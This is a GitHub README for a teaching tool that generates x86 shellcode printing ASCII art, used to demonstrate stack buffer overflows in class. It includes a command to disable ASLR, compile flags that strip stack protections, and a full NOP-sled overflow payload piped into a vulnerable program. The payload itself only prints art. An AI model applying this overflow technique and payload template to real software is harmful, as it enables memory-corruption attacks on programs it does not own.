Skip to content

Latest commit

 

History

History
27 lines (21 loc) · 2.13 KB

README.md

File metadata and controls

27 lines (21 loc) · 2.13 KB

ascii-art-shellcode

Generate shellcode to print ascii art for simple buffer overflows. Mostly wrote this so I can make examples in class more interesting.

Includes a sample ascii art file taken from https://asciiart.website/index.php?art=animals/bats

The basic usage below assumes ASLR is disabled. (i.e. sudo sysctl kernel.randomize_va_space=0 on Debian)

Basic Usage

$ python3 ./ascii_art_shellcode.py bats.ascii

Output

Reading art file bats.ascii Done reading art file Need 3 bytes. Adding space characters (\0x20) Compile line: gcc -fno-builtin -O0 -z execstack -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -m32 vuln.c -o vuln.out Run this command to test your overflow: printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc9\x51\xb8\x09\x20\x20\x20\xfe\xc0\x50\x68\x2e\x2e\x2f\x5c\x68\x20\x20\x2f\x5c\x68\x20\x20\x20\x20\xb8\x5f\x09\x20\x20\xfe\xc4\x50\x68\x5f\x2e\x2e\x5f\x68\x20\x20\x20\x5f\x31\xc0\xb0\x01\xc1\xe0\x10\x05\x2f\x5c\x09\x20\x50\x68\x2f\x5c\x2e\x2e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x89\xe1\xb2\x24\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x1f\xd2\xff\xff" | ./vuln.out

Using the output

$ printf "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc9\x51\xb8\x09\x20\x20\x20\xfe\xc0\x50\x68\x2e\x2e\x2f\x5c\x68\x20\x20\x2f\x5c\x68\x20\x20\x20\x20\xb8\x5f\x09\x20\x20\xfe\xc4\x50\x68\x5f\x2e\x2e\x5f\x68\x20\x20\x20\x5f\x31\xc0\xb0\x01\xc1\xe0\x10\x05\x2f\x5c\x09\x20\x50\x68\x2f\x5c\x2e\x2e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x89\xe1\xb2\x24\xcd\x80\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xd1\xff\xff" | ./vuln.out 0xffffd1ff

/\../\
    __..__
        /\../\

Segmentation fault

Note, you might need to change the last few bytes of the shellcode to match the address that the sample vulnerable program spits out, depending on how you executed the program. Running it in an IDE tends to offset things a bit.